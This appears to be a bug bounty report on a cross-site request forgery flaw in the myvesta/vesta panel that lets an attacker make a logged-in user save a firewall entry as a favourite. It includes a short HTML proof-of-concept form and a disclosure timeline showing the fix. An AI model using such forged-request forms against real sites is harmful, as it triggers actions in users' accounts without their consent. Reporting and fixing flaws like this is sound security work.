Cross-Site Request Forgery (CSRF) in myvesta/vesta


Reported on

Aug 24th 2021

✍️ Description

Attacker is able to add an element to favorite. this vulnerability happens on some sections. for example on “Firewall” tab list/firewall/

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser can check unintentionally first record saves as favorite

<script>history.pushState('', '', '/')</script>
<form action="">
<input type="hidden" name="v&#95;unit&#95;id" value="11" />
<input type="hidden" name="v&#95;section" value="firewall" />
<input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of forging admin or user to unintentional save favorite.

💥 Test

Tested on Edge, Firefox, chrome and safari 📍 Location index.php#L1 📝 References csrf



We have contacted a member of the myvesta/vesta team and are waiting to hear back 2 years ago
Musio modified the report
2 years ago
myvesta validated this vulnerability 2 years ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta marked this as fixed with commit 475fe4 2 years ago
myvesta has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation